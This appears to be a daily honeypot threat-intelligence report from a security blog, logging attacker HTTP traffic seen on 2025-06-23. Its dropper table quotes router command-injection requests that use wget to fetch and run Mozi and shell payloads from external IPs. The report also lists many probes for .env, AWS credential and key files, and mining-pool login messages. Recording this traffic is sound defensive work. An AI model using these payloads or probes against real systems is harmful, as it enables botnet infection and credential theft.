Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-23

·838 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-23
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 110 new requests that have never been observed before (these were added to the monitored request database.).

A total of 775 requests were recorded during the day, originating from 5 different countries, with a peak of 225 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
45.135.194.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1
103.93.93.16227;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
117.209.26.14027;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
139.5.11.123GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.11.123:34619/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
661{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2248JsrSuzreCQUXw5qe1ajS8HotHoCrHVvX7c5tZLiBAc3JzYGSJkJQ8NxqRNkDurMrMAaM34NUBvLdNiF1TY9BVNSU7Gg75\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
841GET /.env.old HTTP/1.1
851GET /.env.www HTTP/1.1
901{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x33fa4f2917facff27ad2a4b29b1b9a5abcbbefd8\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}
1001GET /config/settings.ini HTTP/1.1
1011GET /info HTTP/1.1
1021GET /env.test.js HTTP/1.1
1031GET /info.php HTTP/1.1
1041GET /portal/.env HTTP/1.1
1051GET /env/.env HTTP/1.1
1061GET /dev/.env HTTP/1.1
1071GET /admin/.env HTTP/1.1
1081GET /application/.env HTTP/1.1
1091GET /env.bak HTTP/1.1
1101GET /phpinfo HTTP/1.1
1111GET /_profiler/phpinfo HTTP/1.1
1121GET /phpinfo.php HTTP/1.1
1131GET /.env.bak HTTP/1.1
1141GET /.env.backup HTTP/1.1
1151GET /.env_sample HTTP/1.1
1161GET /aws-secret.yaml HTTP/1.1
1171GET /awstats/.env HTTP/1.1
1181GET /conf/.env HTTP/1.1
1191GET /cron/.env HTTP/1.1
1201GET /www/.env HTTP/1.1
1211GET /docker/.env HTTP/1.1
1221GET /docker/app/.env HTTP/1.1
1231GET /.env.production HTTP/1.1
1241GET /.env.production.local HTTP/1.1
1251GET /.env.prod HTTP/1.1
1261GET /.env.test HTTP/1.1
1271GET /.env.sample.php HTTP/1.1
1281GET /.env.php HTTP/1.1
1291GET /.env1 HTTP/1.1
1301GET /.venv HTTP/1.1
1311GET /env.prod.js HTTP/1.1
1321GET /mailer/.env HTTP/1.1
1331GET /nginx/.env HTTP/1.1
1341GET /public/.env HTTP/1.1
1351GET /site/.env HTTP/1.1
1361GET /xampp/.env HTTP/1.1
1371GET /.docker/laravel/app/.env HTTP/1.1
1381GET /laravel/.env.local HTTP/1.1
1391GET /new/.env HTTP/1.1
1401GET /new/.env.local HTTP/1.1
1411GET /new/.env.production HTTP/1.1
1421GET /new/.env.staging HTTP/1.1
1431GET /_phpinfo.php HTTP/1.1
1441GET /_profiler/phpinfo/info.php HTTP/1.1
1451GET /_profiler/phpinfo/phpinfo.php HTTP/1.1
1461GET /wp-config HTTP/1.1
1471GET /env.php HTTP/1.1
1481GET /bootstrap/cache/config.php HTTP/1.1
1491GET /storage/app/private/.env HTTP/1.1
1501GET /storage/logs/laravel.log HTTP/1.1
1511GET /composer.lock HTTP/1.1
1521GET /server.key HTTP/1.1
1531GET /dump.sh HTTP/1.1
1541GET /php5.ini HTTP/1.1
1551GET /env.backup HTTP/1.1
1561GET /xampp/phpinfo.php HTTP/1.1
1571GET /lara/info.php HTTP/1.1
1581GET /lara/phpinfo.php HTTP/1.1
1591GET /laravel/info.php HTTP/1.1
1601GET /.vscode/.env HTTP/1.1
1611GET /js/.env HTTP/1.1
1621GET /laravel/core/.env HTTP/1.1
1631GET /mail/.env HTTP/1.1
1641GET /docker.sh HTTP/1.1
1661GET /m2Pm HTTP/1.1
1671GET /8nGp HTTP/1.1
1711GET /laravel/.env.production HTTP/1.1
1721GET /laravel/.env.staging HTTP/1.1
1731GET /laravel/core/.env.local HTTP/1.1
1741GET /laravel/core/.env.production HTTP/1.1
1751GET /laravel/core/.env.staging HTTP/1.1
1761GET /main/.env HTTP/1.1
1771GET /.aws/credentials HTTP/1.1
1781GET /config.php HTTP/1.1
1791GET /sendgrid.json HTTP/1.1
1801GET / HTTP/1.1
1811GET /.env HTTP/1.1
1821GET /.env_example HTTP/1.1
1831GET /core/.env HTTP/1.1
1841GET /app/.env HTTP/1.1
1851GET /api HTTP/1.1
1861GET /backend HTTP/1.1
1871GET /env HTTP/1.1
1881GET /laravel/.env HTTP/1.1
1931GET /config.php.bak HTTP/1.1
1941GET /src/app.js HTTP/1.1
1951GET /server-info HTTP/1.1
2051GET /.docker/.env HTTP/1.1
2061GET /.env.dev HTTP/1.1
2071GET /.env.example HTTP/1.1
2081GET /config.env HTTP/1.1
2091GET /.environment HTTP/1.1
2441{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246KuG72PYf92S8EjkPASVkdM3d3Ue4Jwv25sRR4uFs7tFVid9aeGczJVtTtrnp9qu3fZceryhrNrtcyGFNMgR3JSLLXSV6y\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}}
2461\x00\x0E\x08U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00
2471\x00\x0E8U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00
2501\x00\x0E\x08\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00
2511\x00\x0E8\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00
2541GET /web/.env HTTP/1.1
2551GET /crm/.env HTTP/1.1
2561GET /backend/.env HTTP/1.1
2571GET /local/.env HTTP/1.1
2581GET /api/.env HTTP/1.1
2611\x00\x0E\x085C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00
2621\x00\x0E85C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00
2751{\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x20ea1696e333d549e24a3c71964e59fe08bc7df0\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22}

country_iso_code
#

number_of_occurencecountry_iso_code
0225US
1168GB
257NL
345BG
438DE
532JP
631ES
727CN
816SG
914LT
1013CA
1110GH
128CH
138PL
147BR
156MD
166HU
176PT
185UA
195KR
204TR
214IR
223NG
233HK
243IE
253BE
263KZ
273FR
283RU
292IN
302MC
312MO
322VN
332SC
342IL
352ID
361HN
371CZ
381ZA
391CO
401RO

Related

Report: 2025-06-22
·398 words
Repport Daily
Report: 2025-06-21
·525 words
Repport Daily
Report: 2025-06-20
·340 words
Repport Daily